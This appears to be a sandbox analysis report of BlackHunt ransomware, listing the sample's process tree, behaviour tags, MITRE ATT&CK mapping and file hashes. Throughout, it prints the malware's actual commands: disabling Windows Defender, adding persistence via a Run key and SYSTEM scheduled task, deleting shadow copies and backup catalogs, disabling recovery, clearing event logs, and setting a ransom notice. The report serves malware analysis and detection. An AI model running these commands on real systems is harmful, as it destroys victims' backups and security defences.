- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:1040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:4944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:5108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:4444
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2280
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:3644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3984
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3160
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1220
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2032
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1540
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:5052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2148
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1028
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1816
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3376
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:1040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1372
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:4944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2152
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe" /F3⤵
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
PID:844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4012
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2380
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:644
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:4100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1492
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3256
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1716
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5096
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:792
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2820
-
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3180
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1628
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4008
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5328
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:5440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5560
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1644
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:5708
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3448
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2716
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1880
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:5268
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2076
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4640
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4468
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2340
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2468
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3660
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1052
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:5504
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3252
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1784
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1320
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5608
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:5792 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:5520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 14524⤵
- Program crash
PID:2536
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe"2⤵PID:5924
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3952
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2388
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5520 -ip 55201⤵PID:912
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d28fd4fa36ff8ae8bd25dce3e8dc24d3
SHA18d0b5c7d2e8da5cd1f924c7ba60ea32205526842
SHA25653c63415abc12857e076d4454871c0335e6db4ccf062251761a3eacce5e8cba1
SHA512827389224264162182a7d2bd814b455ee2546b28d70e8bc685d9415ab8199de6eaa1c9f0cd31167074c7920be468f85ad0e55ef372e507b6862d3d1acc08ab2b
-
Filesize
684B
MD50634a2b991855f676032272accf5670d
SHA1b5b02202700ce65e04bc2c9b3551e9b0d74737f7
SHA256c5f66b2fdd44aae695d522c6461470eefb2f4b045680cf8f8f66d9b045cb697f
SHA512b1f30df4f4d0c5354306f82830f85788a883a06c77fdca74e4fb5bcd21fdb73b551b3f3725a860145046d6c083dc3f2a083bad97e6e9314cf4440d5ae34331ef
-
Filesize
12KB
MD56fc13a8839c62786a29054732f66fcc7
SHA10e080ae9d1a3d611969cd2a0ae4c7b1d386c3181
SHA2568ab3db76f9c682e6d86bb45c5875bbc4f2c3b8b746c5c4b1fb16b4aa9842a5a8
SHA5125a8c412ee18ffe964a6d61b6cf78f4c5d74d4dbbae06fcf84c0b289e99755b6feea2e67fe53ac52101952bab287fe848e5098a84a46ff6a7022022a6ccada75f